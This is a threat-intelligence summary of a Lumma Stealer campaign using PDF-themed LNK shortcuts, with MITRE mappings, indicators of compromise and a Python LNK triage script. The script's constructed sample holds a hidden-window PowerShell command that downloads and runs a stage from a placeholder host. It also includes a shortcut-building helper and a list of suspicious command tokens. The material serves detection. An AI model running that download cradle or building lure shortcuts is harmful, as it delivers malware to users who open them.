Lumma Stealer Chronicles: PDF-themed Campaign Using Compromised Educational Institutions’ Infrastructure | CloudSEK

Lumma Stealer is an information-stealing malware sold under a Malware-as-a-Service (MaaS) model. The campaign described here, which abuses the infrastructure of compromised educational institutions, delivers it through malicious Windows shortcut (LNK) files disguised as legitimate PDF documents and runs a multi-stage infection chain to harvest sensitive user data across many sectors. Affected: Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, Media & Journalism

Key points:

  • Lumma Stealer is offered as Malware-as-a-Service (MaaS).
  • Designed to steal sensitive information such as passwords and cryptocurrency wallets.
  • Malware campaign uses malicious LNK files appearing as PDF documents to trick users.
  • The infection process includes multiple stages initiated by executing LNK files.
  • Victim sectors include education, corporate, government, healthcare, finance, engineering, and media.
  • Preventing infection depends on user awareness and robust security controls, since the chain starts only when a user opens the shortcut.

MITRE Techniques :

  • Execution (TA0002): T1059.001 – Command and Scripting Interpreter: PowerShell, used to run the script launched from the LNK file.
  • Execution (TA0002): T1204.002 – User Execution: Malicious File that executes upon user interaction with the LNK file.
  • Execution (TA0002): T1047 – Windows Management Instrumentation (WMI) used for executing commands.
  • Persistence (TA0003): T1547.001 – Registry Run Keys / Startup Folder is used to maintain persistence.
  • Defense Evasion (TA0005): T1218.011 – System Binary Proxy Execution: Rundll32, used to execute malicious code through a trusted Windows binary.
  • Defense Evasion (TA0005): T1027 – Obfuscated Files or Information to hide malicious scripts.
  • Defense Evasion (TA0005): T1036.003 – Masquerading: Rename System Utilities to disguise malicious files.
  • Discovery (TA0007): T1012 – Query Registry, used to locate stored data and configuration of interest.
  • Discovery (TA0007): T1082 – System Information Discovery for gathering system details.
  • Lateral Movement (TA0008): T1021.002 – Remote Services: SMB/Windows Admin Shares used for lateral movement.
  • Collection (TA0009): T1114 – Email Collection to gather sensitive emails.
  • Collection (TA0009): T1560 – Archive Collected Data for exfiltration purposes.
  • Command and Control (TA0011): T1071 – Application Layer Protocol for communication with C2 servers.
  • Exfiltration (TA0010): T1041 – Exfiltration Over C2 Channel, used to send the stolen data to the C2 server.
  • Impact (TA0040): T1489 – Service Stop to disrupt services.
  • Impact (TA0040): T1490 – Inhibit System Recovery to prevent recovery efforts.

Indicators of Compromise:

  • [Hash (SHA-256)] bb2e14bb962873722f1fd132ff66c4afd2f7dc9b6891c746d697443c0007426a (pdf.lnk)
  • [Hash (SHA-256)] e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2 (Kompass-4.1.2.exe)
  • [Hash (SHA-256)] 40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15 (Samarik)
  • [Domain] tripeggyun.fun
  • [IP Address] 87.120.115.240
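The key points and MITRE mapping above describe the lure: a Windows shortcut (LNK) dressed up as a PDF whose target launches PowerShell. The triage script below is an added example written for this page, not CloudSEK's code or a tool recovered from the campaign. It parses the MS-SHLLINK header and string fields with the Python standard library, flags a document-themed name, a borrowed document-viewer icon and a PowerShell command line, and compares the file hash against the pdf.lnk indicator listed above. The shortcut it analyses is constructed inline; its target path, arguments and placeholder URL are assumptions, not artefacts from the campaign.

```python
"""Offline triage of a Windows shortcut (.lnk) suspected of masquerading as a PDF.

Parses the MS-SHLLINK header and StringData sections with the standard library
only, then applies heuristics for the tradecraft described on this page.
"""
import hashlib
import re
import struct

LNK_HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} as stored on disk (mixed-endian GUID).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
# SHA-256 of the pdf.lnk indicator listed on this page, lower-cased for lookup.
KNOWN_LNK_HASHES = {"bb2e14bb962873722f1fd132ff66c4afd2f7dc9b6891c746d697443c0007426a"}
DOCUMENT_THEME = re.compile(r"(^|[.\s_-])(pdf|docx?|xlsx?)$")
ICON_THEMES = ("acro", "pdf", "imageres.dll", "shell32.dll")
SUSPICIOUS_TOKENS = ("powershell", "pwsh", "-enc", "-w hidden", "-windowstyle", "iex",
                     "invoke-expression", "downloadstring", "rundll32", "wmic", "mshta", "cmd /c")


def is_shell_link(data: bytes) -> bool:
    """True if the buffer starts with a valid ShellLinkHeader."""
    return (len(data) >= LNK_HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields: name, relative_path, working_dir, arguments, icon_location."""
    if not is_shell_link(data):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:          # LinkTargetIDList: uint16 size followed by that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:        # LinkInfo: uint32 size that includes the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # character count, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def triage_lnk(filename: str, data: bytes) -> dict:
    """Score one shortcut; two or more findings is enough to escalate."""
    fields = parse_lnk(data)
    findings = []
    stem = filename.lower().removesuffix(".lnk")
    if filename.lower().endswith(".lnk") and DOCUMENT_THEME.search(stem):
        findings.append("document-themed shortcut name (T1036)")
    icon = fields.get("icon_location", "").lower()
    if any(theme in icon for theme in ICON_THEMES):
        findings.append("icon borrowed from a document viewer or system DLL")
    cmdline = f"{fields.get('relative_path', '')} {fields.get('arguments', '')}".lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in cmdline]
    if hits:
        findings.append("suspicious command line tokens: " + ", ".join(hits))
    digest = hashlib.sha256(data).hexdigest()
    if digest in KNOWN_LNK_HASHES:
        findings.append("SHA-256 matches a published indicator")
    verdict = "suspicious" if len(findings) >= 2 else ("review" if findings else "benign")
    return {"sha256": digest, "fields": fields, "findings": findings, "verdict": verdict}


def build_lnk(relative_path: str, working_dir: str, arguments: str, icon_location: str) -> bytes:
    """Assemble a minimal Unicode shell link; used here only to construct offline test input."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20,      # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,   # creation / access / write FILETIMEs
                         0, 0,      # FileSize, IconIndex
                         7,         # ShowCommand SW_SHOWMINNOACTIVE: window stays out of sight
                         0, 0, 0, 0)
    strings = (relative_path, working_dir, arguments, icon_location)
    return header + b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)


# Constructed sample mimicking the pdf.lnk lure: PowerShell target, Acrobat icon, hidden window.
# The URL is a placeholder (assumption), not an indicator from the page.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32",
    "-w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('http://lure.invalid/stage2')\"",
    r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
)
# Constructed benign shortcut for comparison.
BENIGN_LNK = build_lnk(r"..\..\Windows\notepad.exe", r"C:\Windows", "", r"%SystemRoot%\notepad.exe")

if __name__ == "__main__":
    for name, blob in (("pdf.lnk", SAMPLE_LNK), ("Notes.lnk", BENIGN_LNK)):
        report = triage_lnk(name, blob)
        print(name, report["verdict"], report["findings"])
```

Run it against real files with `triage_lnk(path.name, path.read_bytes())`. A single finding is worth a look, two or more should be escalated, and a hash hit is a confirmed match regardless of the heuristics; the token list is deliberately short and should be extended with whatever the full report shows in the actual LNK command line.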

Full Story: https://www.cloudsek.com/blog/lumma-stealer-chronicles-pdf-themed-campaign-using-compromised-educational-institutions-infrastructure